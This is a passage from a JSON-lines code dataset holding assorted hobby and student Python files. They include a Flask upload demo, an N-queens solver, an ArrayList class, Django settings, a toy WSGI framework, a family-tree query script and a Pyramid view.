False\n\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n file = request.files.get('pic')\n if file is None:\n return render_template('index.html')\n if 
if allowed(file.filename):\n        # secure_filename(filename) returns a safe version of the filename; names that are irregular (in a browser URL) are renamed to well-formed ones.\n        file.save(secure_filename(file.filename))\n        print('file:', file)\n        return 'save file success!'\n    return 'error,unsupported file format!'\n\n\n# images under the img directory of the static folder can be accessed from the browser\n@app.route('/upload/', methods=['GET', 'POST'])\ndef get_upload(filename):\n    # print('filename:', filename)\n    # print('path1:', os.getcwd())\n    # print('path2:', os.path.join(os.getcwd(), 'static/img'))\n    return send_from_directory(os.path.join(os.getcwd(), 'static/img'), filename)\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"learn_flask/flask05_requestObj_and_responseObj/demo01_ajax.py","file_name":"demo01_ajax.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399090922","text":"from Biblioteca import *\r\n\r\n#Infrastructure/Repository Layer\r\n\r\nclass BookFileRepository:\r\n    def __init__(self):\r\n        self.carti = []\r\n\r\n    def loadFromFile(self):\r\n        f = open(\"datein.txt\", \"r\")\r\n        line = f.readline().strip()\r\n        rez = []\r\n        while line != \"\":\r\n            attrs = line.split(\" \")\r\n            st = Carte(attrs[0], attrs[1])\r\n            rez.append(st)\r\n            self.carti.append(st)\r\n            line = f.readline().strip()\r\n        f.close()\r\n        return rez\r\n\r\n    def storeToFile(self, sts):\r\n        f = open(\"datein.txt\", \"w\")\r\n        strf = \"\"\r\n        print(sts)\r\n        for st in sts:\r\n            strf =strf + str(st.getId())+\" \"+st.getTitlu()\r\n            strf = strf + \"\\n\"\r\n        f.writelines(strf)\r\n        print(strf)\r\n        f.close()\r\n\r\n    def depoziteazaCarte2(self, st):\r\n        allS = self.loadFromFile()\r\n        allS.append(st)\r\n        self.carti.append(st)\r\n        self.storeToFile(allS)\r\n\r\n    def stergeCarte2(self, cartii):\r\n        id = input(\"ID: \")\r\n        for carte in cartii:\r\n            if carte.getId() == id:\r\n                cartii.remove(carte)\r\n        self.carti = cartii\r\n        self.storeToFile(self.carti)\r\n\r\n    def modificaCarte2(self, cartenoua):\r\n        id = input(\"ID of book to modify = \")\r\n        for carte in self.carti:\r\n            if carte.getId() == id:\r\n                self.carti.remove(carte)\r\n        self.carti.append(cartenoua)\r\n        print(self.carti)\r\n        self.storeToFile(self.carti)\r\n","sub_path":"BookFileRepository.py","file_name":"BookFileRepository.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46048396","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[85]:\n\n\nimport random\nimport math\nimport matplotlib.pyplot as plt\n\n\n# In[86]:\n\n\nimport numpy as np\nboard=[[]]\nprint ('Please enter the size of the chessboard: ')\nn = int(input())\nboard=np.random.randint(n, size=(4,4))\nprint(board)\nm=board.size\nprint(m)\n\n\n# In[87]:\n\n\ndef isSafe(board, row, col): \n    \n    # Check this row on left side \n    N=4\n    for i in range(col): \n        if board[row][i] == 1: \n            return False\n    \n    # Check upper diagonal on left side \n    for i, j in zip(range(row, -1, -1), range(col, -1, -1)): \n        if board[i][j] == 1: \n            return False\n    \n    # Check lower diagonal on left side \n    for i, j in zip(range(row, N, 1), range(col, -1, -1)): \n        if board[i][j] == 1: \n            return False\n    \n    return True\n\n\n# In[88]:\n\n\nisSafe(board, 2, 2)\n\n\n# In[89]:\n\n\ndef Deplacer(board, col): \n    # base case: If all queens are placed \n    # then return true\n    N=4\n    if col >= N: \n        return True\n    \n    # Consider this column and try placing \n    # this queen in all rows one by one \n    for i in range(N): \n        \n        if isSafe(board, i, col): \n            # Place this queen in 
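The `allowed` helper above compares extensions case-sensitively, so a name like 'photo.PNG' would be rejected; a slightly hardened sketch:

ALLOWED_EXTENSIONS = {'png', 'jpg', 'html', 'txt'}

def allowed(filename):
    # require a dot and compare the extension case-insensitively
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS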
board[i][col] \n board[i][col] = 1\n \n # recur to place rest of the queens \n if Deplacer(board, col + 1) == True: \n return True\n \n # If placing queen in board[i][col \n # doesn't lead to a solution, then \n # queen from board[i][col] \n board[i][col] = 0\n \n # if the queen can not be placed in any row in \n # this colum col then return false \n return False\ndef solveNQ(): \n board = [ [0, 0, 0, 0], \n [0, 0, 0, 0], \n [0, 0, 0, 0], \n [0, 0, 0, 0] \n ] \n \n if Deplacer(board, 0) == False: \n print (\"Solution does not exist\")\n return False\n else:\n print(board) \n return True\n\n\n# In[90]:\n\n\nDeplacer(board, 0)\n\n\n# In[91]:\n\n\nsolveNQ()\n\n\n# In[92]:\n\n\ndef reine(n):\n def _reine(s,n,solutions): \n if len(s)==n: solutions.append(s)\n else:\n for i1 in set(range(1,n+1))-set(s): \n liste=[len(s)-j!=abs(i1-i) for j,i in enumerate(s)]\n if not(False in liste): _reine(s+[i1],n,solutions)\n solutions=[]\n _reine([],n,solutions)\n return solutions,('Nombre de solutions : %d' % len(solutions))\n\n\n# In[93]:\n\n\nreine(4)\n\n\n# In[94]:\n\n\nreine(6)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Problème Echiquier.py","file_name":"Problème Echiquier.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"300812840","text":"class ArrayList:\r\n\tdef __init__(self, initialCapacity=10):\r\n\t\tself.capacity = initialCapacity\r\n\t\tself.data = [None] * self.capacity\r\n\t\tself.length = 0\r\n\r\n\tdef __str__(self):\r\n\t\toutput = \"[\"\r\n\t\tif(self.length == 0):\r\n\t\t\toutput += \"]\"\r\n\t\telif(self.length == 1):\r\n\t\t\toutput += \"{0}]\".format(self.data[0])\r\n\t\telse:\r\n\t\t\tfor i in range(self.length - 1):\r\n\t\t\t\toutput += \"{0}, \".format(self.data[i])\r\n\t\t\t\r\n\t\t\toutput += \"{0}]\".format(self.data[self.length - 1])\r\n\r\n\t\treturn output\r\n\r\n\tdef access(self, index):\r\n\t\tif(index >= self.length):\r\n\t\t\traise self.InvalidIndexError(\"No element at index {0} in list of length {1}\".format(index, self.length))\r\n\t\telif(index < 0):\r\n\t\t\traise self.InvalidIndexError(\"Negative index of {0}\".format(index))\r\n\t\telse:\r\n\t\t\treturn self.data[index]\r\n\r\n\tdef insert(self, data):\r\n\t\tif(self.length >= self.capacity):\r\n\t\t\tself.capacity *= 2\r\n\t\t\tnew = [None] * self.capacity\r\n\t\t\tfor i in range(self.length):\r\n\t\t\t\tnew[i] = self.data[i]\r\n\t\t\tself.data = new\r\n\r\n\t\tself.data[self.length] = data\r\n\t\tself.length += 1\r\n\r\n\tdef search(self, data):\r\n\t\tfor i in range(self.length):\r\n\t\t\tif(data == self.data[i]):\r\n\t\t\t\treturn i\r\n\t\treturn -1\r\n\r\n\tdef delete(self, index=None):\r\n\t\tif(index == None):\r\n\t\t\tself.length -= 1\r\n\t\t\tif(self.length <= self.capacity / 2):\r\n\t\t\t\tself.capacity = self.capacity // 2\r\n\t\t\t\tnew = [None] * self.capacity\r\n\t\t\t\tfor i in range(self.length):\r\n\t\t\t\t\tnew[i] = self.data[i]\r\n\t\t\t\tself.data = new\r\n\t\telif(index >= self.length):\r\n\t\t\traise self.InvalidIndexError(\"No element at index {0} in list of length {1}\".format(index, self.length))\r\n\t\telif(index < 0):\r\n\t\t\traise self.InvalidIndexError(\"Negative index of {0}\".format(index))\r\n\t\telse:\r\n\t\t\tfor i in range(index, self.length):\r\n\t\t\t\tself.data[i] = self.data[i + 1]\r\n\t\t\t\tself.length -= 1\r\n\t\t\tif(self.length <= self.capacity / 2):\r\n\t\t\t\tself.capacity = self.capacity // 2\r\n\t\t\t\tnew = [None] * self.capacity\r\n\t\t\t\tfor i in 
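The `reine` enumerator above builds solutions column by column, pruning with the same row and diagonal tests as `isSafe`; the known N-queens solution counts (2 for N=4, 10 for N=5, 4 for N=6, 92 for N=8) give a quick correctness check:

EXPECTED = {4: 2, 5: 10, 6: 4, 8: 92}  # known distinct N-queens solution counts
for n, want in EXPECTED.items():
    solutions, _ = reine(n)
    assert len(solutions) == want, (n, len(solutions))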
range(self.length):\r\n\t\t\t\t\tnew[i] = self.data[i]\r\n\t\t\t\tself.data = new\r\n\r\n\tclass InvalidIndexError(Exception):\r\n\t\tdef __init__(self, msg):\r\n\t\t\tself.msg = msg\r\n\t\tdef __str__(self):\r\n\t\t\treturn self.msg\r\n\r\nif __name__ == \"__main__\":\r\n\tmyList = ArrayList()","sub_path":"data_structures/arraylist.py","file_name":"arraylist.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401028172","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# © 2017-2019, ETH Zurich, Institut für Theoretische Physik\n# Author: Dominik Gresch \n\nimport tempfile\n\nimport pytest\nimport numpy as np\n\n\n@pytest.mark.parametrize(\n 'bands_params', [{\n 'kpoints': [[0., 0., 0.]],\n 'eigenvals': [[0, 1., 2.]]\n }]\n)\ndef test_write_read(configure, bands_params): # pylint: disable=unused-argument\n from aiida.plugins import DataFactory\n from aiida_bands_inspect.io import read_bands, write_bands\n BandsData = DataFactory('array.bands')\n bands = BandsData()\n bands.set_kpoints(bands_params['kpoints'])\n bands.set_bands(bands_params['eigenvals'])\n with tempfile.NamedTemporaryFile() as tmpf:\n write_bands(bands, tmpf.name)\n res = read_bands(tmpf.name)\n assert np.allclose(res.get_kpoints(), bands.get_kpoints())\n assert np.allclose(res.get_bands(), bands.get_bands())\n\n\ndef test_read(configure, sample): # pylint: disable=unused-argument\n from aiida_bands_inspect.io import read_bands\n res = read_bands(sample('bands_mesh.hdf5'))\n assert np.allclose(res.get_kpoints(), [[0., 0., 0.], [0., 0., 0.5]])\n assert np.allclose(res.get_bands(), [[1, 2], [3, 4]])\n","sub_path":"tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"62654006","text":"import os\n\nDIRNAME = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = TEMPLATE_DEBUG = False\n\nADMINS = (\n ('Den Schigrov', 'den.schigrov@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'poputchik',\n 'USER': 'poputchik',\n }\n}\n\nTIME_ZONE = 'America/Toronto'\n\nLANGUAGE_CODE = 'en-us'\n\nMEDIA_ROOT = os.path.join(DIRNAME, 'media')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = DIRNAME + '/static'\nSTATIC_URL = '/static/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nSTATICFILES_DIRS = (\n DIRNAME + '/staticfiles',\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'tw425ehotwktw4io4209yot42142yjtlkegwknlqr3kl325gwrewklt24'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'content.context_processors.site_elements',\n)\n\nROOT_URLCONF = 'img.urls'\n\nTEMPLATE_DIRS = (\n 
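The indexed branch of `ArrayList.delete` above decrements `length` once per shifted element (inside the loop) and can read `self.data[i + 1]` one slot past the last element; a corrected sketch of the shift (the `delete_at` name is illustrative):

def delete_at(self, index):
    # shift everything after index left by one, then shrink the length once
    for i in range(index, self.length - 1):
        self.data[i] = self.data[i + 1]
    self.length -= 1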
DIRNAME + '/templates',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'content',\n 'contact',\n 'account',\n 'imagekit',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nSTATIC_SERVE_ROOT = None\n\ntry:\n from settings_local import *\nexcept:\n pass\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"557718618","text":"from scamp import *\nfrom pynput import mouse\n\nfrom scamp import Session, Ensemble\n\ndef construct_ensemble():\n global piano_clef,piano_bass, flute, strings, session\n ensemble = Ensemble(default_soundfont=\"/usr/share/sounds/sf2/FluidR3_GM.sf2\")\n\n #ensemble.print_default_soundfont_presets()\n\n piano_clef = ensemble.new_part(\"harp\")\n piano_bass = ensemble.new_part(\"violoncello\")\n return [piano_clef,piano_bass,ensemble.new_part(\"piano\"),ensemble.new_part(\"piano\"),ensemble.new_part(\"harp\"),ensemble.new_part(\"flute\")]\n #strings = ensemble.new_part(\"strings\", (0, 40))\n\n\n\n\ndef aT(u,a):\n if u in [1,5,7,11]:\n return lambda x : (u*x+a)%12\n\ndef mul(U,V):\n u,a = U\n x,y = V\n return ((u*x)%12,(u*y+a)%12)\n\ndef iterMul(x,k):\n if k == 1:\n return x\n else:\n return mul(iterMul(x,k-1),x)\n\ndef orderMul(x):\n y = x\n o = 1\n while y!=(1,0):\n o+=1\n y = mul(y,x)\n return o\n \n\n\ndef on_move(x, y):\n global currentCounter\n print('Pointer moved to {0}'.format(\n (x, y)))\n currentCounter += y-x\n\ndef on_click(x, y, button, pressed):\n global countClick\n print('{0} at {1}'.format(\n 'Pressed' if pressed else 'Released',\n (x, y)))\n if pressed:\n countClick += 1\n #print(countClick)\n \ndef on_scroll(x, y, dx, dy):\n global currentCounter, startPitch, oneOctave,twoLoops, instrument\n print('Scrolled {0} at {1}'.format(\n 'down' if dy < 0 else 'up',\n (x, y)))\n if dy>=0:\n currentCounter += 1\n else:\n currentCounter -= 1\n\n# Collect events until released\n#with mouse.Listener(\n# on_move=on_move,\n# on_click=on_click,\n# on_scroll=on_scroll) as listener:\n# listener.join()\n\n# ...or, in a non-blocking fashion:\nlistener = mouse.Listener(on_move=on_move,on_click=on_click,on_scroll=on_scroll)\n\n\ncountClick = 0 \ncurrentCounter = 0\noneOctave = list(range(60,72))\nbassOctave = list(range(60-1*12,60-0*12))\nstartPitchClef = 0 \nstartPitchBass = 1\naffineGroup = [aT(u,a) for u in [1,5,7,11] for a in range(12)] \naffineGroupIndex = [(u,a) for u in [1,5,7,11] for a in range(12)] \n\naffineGroupByOrder = [ (orderMul(x),x) for x in affineGroupIndex]\nprint(affineGroupByOrder)\ntwoLoops = [x for o,x in affineGroupByOrder if o==2]\nthreeLoops = [x for o,x in affineGroupByOrder if o==3]\nfourLoops = [x for o,x in affineGroupByOrder if o==4]\nprint(len(twoLoops))\nprint(len(fourLoops))\ncountBass = 0\n\n#s = Session(default_soundfont_preset=\"path/to/soundfont.sf2\")\n#s = Session(default_soundfont=\"/usr/share/sounds/sf2/FluidR3_GM.sf2\",tempo=130)\ns = Session(tempo=120)\n\ntracks = 
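A quick sanity check of the mod-12 affine group helpers defined above, where `(u, a)` acts on a pitch class as x -> (u*x + a) % 12:

assert aT(5, 3)(7) == (5 * 7 + 3) % 12   # == 2
assert mul((5, 3), (7, 2)) == (11, 1)    # (5*7) % 12 = 11, (5*2 + 3) % 12 = 1
assert orderMul((11, 0)) == 2            # 11*11 = 121 = 1 (mod 12)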
construct_ensemble()\n#s.print_default_soundfont_presets()\n\n#print(dir(s))\n#s.print_available_midi_output_devices()\n\n#drums = s.new_part(\"Concert Bass Drum\")\n\n\ndef play_notes_for_first(numNotes,duration):\n global countBass, countClick, tracks, currentCounter, startPitchClef, oneOctave,twoLoops, instrument, affineGroupIndex, bass\n print(\"playing first\" ,oneOctave[startPitchClef]) \n \n for k in range(numNotes):\n tracks[(countClick%len(tracks)+countClick%2)%len(tracks)].play_note(oneOctave[startPitchClef], 0.7,duration)\n #tracks[1].play_note(bassOctave[startPitch], 1, 1.0)\n startPitchClef = aT(*affineGroupIndex[currentCounter%len(affineGroupIndex)])(startPitchClef) \n \n\ndef play_notes_for_second(numNotes,duration):\n global countBass,countClick, tracks, currentCounterBass, startPitchBass, oneOctave,twoLoops, instrument, affineGroupIndex, bass\n print(\"playing second\" ,bassOctave[startPitchBass]) \n \n #tracks[0].play_note(oneOctave[startPitch], 0.5, 0.5)\n for k in range(numNotes):\n tracks[(countClick%len(tracks)+(countClick+1)%2)%len(tracks)].play_note(bassOctave[startPitchBass], 0.7, duration)\n countBass+=1\n startPitchBass = aT(*affineGroupIndex[currentCounter%len(affineGroupIndex)])(startPitchBass) \n \n \nif __name__==\"__main__\":\n listener.start()\n while True:\n if countBass%8 in [0,3,6]:\n s.fork(play_notes_for_first,(4,0.5))\n s.fork(play_notes_for_second,(1,2.0))\n else:\n s.fork(play_notes_for_first,(2,0.5))\n s.fork(play_notes_for_second,(1,1.0))\n s.wait_for_children_to_finish()","sub_path":"scampUI.py","file_name":"scampUI.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261865468","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\", encoding='UTF8')\n\nT = 10\n\nfor test_case in range(1, T + 1):\n cnt = 0\n tc = int(input())\n s = input()\n _input = input()\n for i in range(len(_input)):\n if s[0] == _input[i]:\n if s == _input[i:(i+len(s))]:\n cnt += 1\n print(\"#\" + str(test_case) + \" \", end='')\n print(cnt)\n # print(_input.count(s))\n","sub_path":"samsung/10_1213.py","file_name":"10_1213.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488820901","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"web_py.py\"\"\"\nimport inspect\nimport re\nimport threading\n\nctx = threading.local()\n\nclass application:\n \"\"\"my simple web framework\"\"\"\n\n headers = []\n\n def __init__(self, urls=()):\n _urls = []\n for pattern, klass, pstr in urls:\n if inspect.isclass(klass):\n obj = klass()\n elif inspect.ismodule(klass):\n obj = klass\n else:\n raise ValueError(repr(klass) + ' must be class or module')\n refunc = re.compile('^' + pattern + '$')\n _urls.append(refunc, obj)\n self._urls = tuple(_urls)\n self._status = '200 OK'\n\n def __call__(self, environ, start_response):\n del self.headers[:] # 在每次作出响应前,清空上一次的headers\n result = self._delegate(environ)\n start_response(self._status, self.headers)\n\n # 将返回值result(字符串 或者 字符串列表)转换为迭代对象\n if isinstance(result, basestring):\n return iter([result])\n else:\n return iter(result)\n\n def _delegate(self, environ):\n path = environ['PATH_INFO']\n method = environ['REQUEST_METHOD'].upper() # 方法名大写(如GET、POST)\n\n for refunc, obj in self._urls:\n m = re.match(path)\n if m:\n kwds = self._valid(m.groups(), )\n funcname = \"%s_%s\" % (kwds.get('action', 'index').lower(), method)\n if hasattr(obj, 
funcname):\n return obj.funcname(**kwds)\n else:\n return self._notfound(\"Not Action Found\\n\")\n\n return self._notfound(\"Not Match Found\\n\")\n\n def _notfound(self, msg):\n status = '404 Not Found'\n return self._bad_status(status, msg)\n\n def _bad_status(self, status, msg):\n self.status = status\n self.header('Content-type', 'text/html')\n return msg\n\n @classmethod\n def del_header(cls):\n del self.headers[:]\n\n @classmethod\n def header(cls, name, value):\n cls.headers.append((name, value))\n\nheader = application.header","sub_path":"web_py.py","file_name":"web_py.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"389535644","text":"def recAncestors(p1):\r\n #if the person exists and they have parents\r\n #call recursive on their parents\r\n #if they dont have parents, just return person's name\r\n try:\r\n person = family[p1];\r\n parents = list(person[\"parent\"]);\r\n except KeyError as e:\r\n return p1;\r\n fullstring = p1 + \" \" + recAncestors(parents[0]) + \" \" + recAncestors(parents[1]);\r\n return fullstring;\r\n\r\n#handleE\r\n#adds people to family and define parent child relationships\r\n#pXDict is a reference to dictionary of that person\r\ndef handleE2(p1,p2):\r\n p1Dict = family.setdefault(p1,{});\r\n p2Dict = family.setdefault(p2,{});\r\n\r\n p1Spouses = p1Dict.setdefault(\"spouse\",set());\r\n p1Spouses.add(p2);\r\n\r\n p2Spouses = p2Dict.setdefault(\"spouse\",set());\r\n p2Spouses.add(p1);\r\n return 1;\r\n \r\ndef handleE3(p1,p2,p3):\r\n p1Dict = family.setdefault(p1,{});\r\n p2Dict = family.setdefault(p2,{});\r\n p3Dict = family.setdefault(p3,{});\r\n\r\n p1Spouses = p1Dict.setdefault(\"spouse\",set());\r\n p1Spouses.add(p2);\r\n p1Children = p1Dict.setdefault(\"children\",set());\r\n p1Children.add(p3);\r\n \r\n p2Spouses = p2Dict.setdefault(\"spouse\",set());\r\n p2Spouses.add(p1);\r\n p2Children = p2Dict.setdefault(\"children\",set());\r\n p2Children.add(p3);\r\n \r\n p3Parents = p3Dict.setdefault(\"parent\",set());\r\n p3Parents.add(p1);\r\n p3Parents.add(p2);\r\n return 1;\r\n\r\ndef handleW(s1,p1):\r\n #If person exists ret = personDict\r\n #otherwise return empty list\r\n try:\r\n ret = family[p1];\r\n except KeyError as e:\r\n return [];\r\n \r\n #case spouse\r\n if(s1 == \"spouse\"):\r\n try:\r\n ret = ret[\"spouse\"];\r\n except KeyError as e:\r\n return [];\r\n #case parent\r\n elif(s1 == \"parent\"):\r\n try:\r\n ret = ret[\"parent\"];\r\n except KeyError as e:\r\n return[];\r\n #case sibling\r\n elif(s1 == \"sibling\"):\r\n try:\r\n #list of strings which contain parents names\r\n parents = list(ret[\"parent\"]);\r\n\r\n #lookup parent in family dictionary\r\n #then find their children set\r\n parent1 = family[parents[0]];\r\n parent1children = parent1[\"children\"];\r\n\r\n parent2 = family[parents[1]];\r\n parent2children = parent2[\"children\"];\r\n except KeyError as e:\r\n return[];\r\n\r\n #take the intersection of the two sets\r\n ret = parent1children & parent2children;\r\n ret.remove(p1);\r\n #case half-sibling\r\n elif(s1 == \"half-sibling\"):\r\n try:\r\n #same logic as sibling case\r\n parents = list(ret[\"parent\"]);\r\n \r\n parent1 = family[parents[0]];\r\n parent1children = parent1[\"children\"];\r\n\r\n parent2 = family[parents[1]];\r\n parent2children = parent2[\"children\"];\r\n except KeyError as e:\r\n return[];\r\n\r\n #take the symmetric of the two sets\r\n ret = parent1children ^ parent2children;\r\n #case ancestor\r\n 
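As written, `_delegate` above calls `re.match(path)` without a pattern, `__init__` passes two arguments to `_urls.append` instead of one tuple, and dispatch looks up the literal attribute `obj.funcname`; the intended routing appears to be the following (a sketch; `_valid` is never defined, so named groups stand in for it):

def _delegate(self, environ):
    path = environ['PATH_INFO']
    method = environ['REQUEST_METHOD'].upper()
    for refunc, obj in self._urls:   # requires _urls.append((refunc, obj)) in __init__
        m = refunc.match(path)       # match against the compiled pattern
        if m:
            kwds = m.groupdict()
            funcname = "%s_%s" % (kwds.get('action', 'index').lower(), method)
            handler = getattr(obj, funcname, None)
            if handler is None:
                return self._notfound("Not Action Found\n")
            return handler(**kwds)
    return self._notfound("Not Match Found\n")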
elif(s1 == \"ancestor\"):\r\n fullstring = recAncestors(p1);\r\n ret = set(fullstring.split());\r\n #ret should never be empty, if recAncestor is called on:\r\n #a person who doesnt exist or who doesnt have parents\r\n #these both return at least p1 as the name\r\n ret.remove(p1);\r\n elif(s1 == \"cousin\"):\r\n #declair empty set\r\n ret = set();\r\n #get p1's ancestors, if there are none then they cannot have cousins\r\n p1Ancestor = handleW(\"ancestor\",p1);\r\n if(not p1Ancestor):\r\n return [];\r\n potentialRelatives = family.keys();\r\n for name in potentialRelatives:\r\n relAncestor = handleW(\"ancestor\",name);\r\n #if set not empty and if there is an overlap\r\n if(p1Ancestor & relAncestor):\r\n ret.add(name);\r\n ret.remove(p1); \r\n #base case\r\n else:\r\n return [];\r\n return ret; \r\ndef handleX(s1,s2,s3):\r\n tmp = handleW(s2,s3);\r\n if s1 in tmp:\r\n return True;\r\n else:\r\n return False;\r\ndef handleR(s1,s2):\r\n if(handleX(s1,\"spouse\",s2) == True):\r\n print(\"Spouse\");\r\n elif(handleX(s1,\"parent\",s2) == True):\r\n print(\"Parent\");\r\n elif(handleX(s1,\"sibling\",s2) == True):\r\n print(\"Sibling\");\r\n elif(handleX(s1,\"half-sibling\",s2) == True):\r\n print(\"half-Sibling\");\r\n elif(handleX(s1,\"ancestor\",s2) == True):\r\n print(\"Ancestor\");\r\n elif(handleX(s1,\"cousin\",s2) == True):\r\n print(\"Cousin\");\r\n else:\r\n print(\"Unrelated\");\r\n print(\"\");\r\n return 1;\r\n\r\n#handleP\r\n#a debugging tool that prints out contents of each member of the family when called\r\ndef handleP():\r\n for v in family:\r\n print(15*'*');\r\n print(v);\r\n print(family[v]);\r\n print(15*'*');\r\n \r\n print(sorted(family.keys()));\r\n print('handledP');\r\n\r\n#create dictionary datastructure\r\nfamily = {}\r\n#run until EOF\r\nwhile(1):\r\n #If it is at EOF, exit main loop\r\n #otherwise continue to process\r\n try:\r\n s = input();\r\n except EOFError as e:\r\n break;\r\n \r\n #tokenize the string\r\n tokenList = s.split();\r\n\r\n #determine query case\r\n if(tokenList[0] == 'E' and len(tokenList) == 4):\r\n handleE3(tokenList[1],tokenList[2],tokenList[3]);\r\n\r\n if(tokenList[0] == 'E' and len(tokenList) == 3):\r\n handleE2(tokenList[1],tokenList[2]);\r\n\r\n if(tokenList[0] == 'R'):\r\n print(s);\r\n handleR(tokenList[1],tokenList[2]);\r\n\r\n if(tokenList[0] == 'X'):\r\n print(s);\r\n if(handleX(tokenList[1],tokenList[2],tokenList[3])):\r\n print(\"Yes\\n\");\r\n else:\r\n print(\"No\\n\");\r\n \r\n\r\n if(tokenList[0] == 'W'):\r\n print('W '+ tokenList[1] +' '+tokenList[2]);\r\n val = handleW(tokenList[1],tokenList[2]);\r\n val = sorted(val);\r\n for i in val:\r\n print(i);\r\n print('');\r\n\r\n #if(tokenList[0] == 'P'):\r\n # print('P');\r\n # handleP();\r\n","sub_path":"Calabrese.py","file_name":"Calabrese.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"616390505","text":"import io\nimport time\nfrom concurrent.futures import ProcessPoolExecutor\nfrom pathlib import Path\n\nimport numpy as np\nimport requests\nfrom PIL import Image\n\nIMAGE_FOLDER = Path(\".\").absolute() / \"demo\"\n\n\ndef download_image(img_url: str, save_loc: Path) -> np.ndarray:\n img_url = img_url.replace(\"\\n\", \"\")\n img_bytes = requests.get(img_url).content\n img_name = img_url.split(\"/\")[-1].replace(\"\\n\", \"\")\n\n save_loc.mkdir(parents=True, exist_ok=True)\n\n with open(save_loc / img_name, \"wb\") as img_file:\n img_file.write(img_bytes)\n\n return 
np.array(Image.open(io.BytesIO(img_bytes)))\n\n\nif __name__ == \"__main__\":\n start = time.perf_counter()\n\n with open(IMAGE_FOLDER / \"demo_urls.txt\", \"r\") as f:\n img_urls = [f.readline() for _ in range(10)]\n\n with ProcessPoolExecutor() as executor:\n for url in img_urls:\n executor.submit(download_image, url, IMAGE_FOLDER)\n\n finish = time.perf_counter()\n print(f\"Finished in {round(finish-start, 2)} seconds\")\n","sub_path":"python3/19_Concurrency_and_Parallel_Programming/01_MultiThreading/i_concurrent_futures/c_process_pool_usage.py","file_name":"c_process_pool_usage.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348054008","text":"from pyramid.view import view_config\nfrom ..models.main_models import *\n\nfrom greggo.storage.redis.voters_age_storage import PollVotersAgeStorage\nfrom greggo.storage.redis.voters_gender_storage import PollVotersGenderStorage\nfrom greggo.config import REDIS_SERVER\n\nfrom ..utils.scraper_util import get_page_thumb_title_desc, url_exists, get_first_url\nfrom ..utils.compile_util import compile_poll_details, compile_opinion_details\nfrom pyramid.response import Response\nimport transaction\nfrom pyramid.httpexceptions import HTTPFound\nimport uuid\nfrom sqlalchemy import or_, and_\nfrom ..services.activity_service import get_source\nfrom ..services.follow_service import FollowService\n\n\n@view_config(route_name='view_profile', renderer='../templates/profile_page_mobile.jinja2')\ndef view_profile(request):\n from repoll.services.follow_service import FollowService\n user_id = request.matchdict.get('user_id', -1)\n #user_slug = request.matchdict.get('slug', None)\n user_is_self = False\n polls = []\n is_following = False\n\n user = request.dbsession.query(User).filter(User.id == user_id).first()\n polls = reversed(user.polls[0:30])\n\n if request.user: \n user_is_self = request.user.id == int(user_id)\n return {'user': user, 'polls': polls, 'user_is_self': 